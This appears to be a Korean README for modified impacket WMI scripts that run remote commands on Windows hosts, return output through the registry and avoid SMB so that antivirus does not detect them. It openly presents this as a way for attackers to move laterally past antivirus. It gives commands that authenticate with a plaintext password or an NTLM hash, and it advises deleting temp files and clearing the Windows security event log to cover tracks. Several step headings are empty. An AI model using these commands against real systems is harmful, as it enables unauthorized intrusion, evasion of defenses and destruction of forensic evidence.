
impacket wmiexec.py의 수정 버전으로, 레지스트리에서 출력(데이터, 응답)을 가져오며, SMB 연결이 필요 없고, WMIHACKER와 같은 측면 이동에서 안티바이러스 소프트웨어를 우회합니다.
impacket wmiexec.py, wmipersist.py의 수정 버전입니다. 레지스트리에서 출력(데이터, 응답)을 가져오며 SMB 연결이 필요하지 않지만, 코드가 좋지 않습니다 :(
원본 wmiexec.py에서는 SMB 연결(포트 445,139)을 통해 응답을 받습니다. 불행히도 일부 안티바이러스 소프트웨어는 이러한 포트를 고위험으로 모니터링합니다.
이 경우 SMB 연결 기능을 제거하고 다른 방법을 사용하여 명령을 실행합니다.
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration
Name: EnableAt
Type: REG_DWORD
Value: 1
wmipersist-wip.py (매우 추천, !!!impacket v0.9.24에서만 작동!!!): vbs 템플릿을 가져온 WMIHACKER의 Python 버전입니다. 공격자는 이를 사용하여 안티바이러스 소프트웨어가 실행 중인 환경에서 안전하게 측면 이동을 수행할 수 있습니다.
wmiexec-regOut.py: 간단한 Win32_Process.create 메서드 예제입니다.
1단계:
2단계:
3단계:
4단계:
5단계:
1단계:
2단계:
3단계:
일반적으로 공식 impacket을 설치하기만 하면 됩니다.
일반 텍스트 비밀번호 사용
python3 wmiexec-reg.py administrator:[email protected] 'whoami'

NTLM 해시 사용
python3 wmiexec-reg.py -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 [email protected] 'whoami'

일반 텍스트 비밀번호 사용 (출력 없음)
python3 wmipersist-wip.py administrator:[email protected] 'command'

NTLM 해시 사용
python3 wmipersist-wip.py -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 [email protected] 'whoami'
출력과 함께 명령을 실행한 후 임시 디렉터리를 정리하는 것을 잊지 마세요.
명령: del /q /f /s C:\windows\temp\*

명령에 큰따옴표가 포함된 경우.
작은따옴표 안에 큰따옴표를 넣으세요 wevtutil cl '"security"'


출력 포함
python3 wmipersist-wip.py administrator:[email protected] "whoami /priv" -with-output
python3 wmipersist-wip.py [email protected] "whoami /priv" -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 -with-output

Huorong 안티바이러스 소프트웨어 환경에서 (WMIHACKER VBS 템플릿 사용!!!)
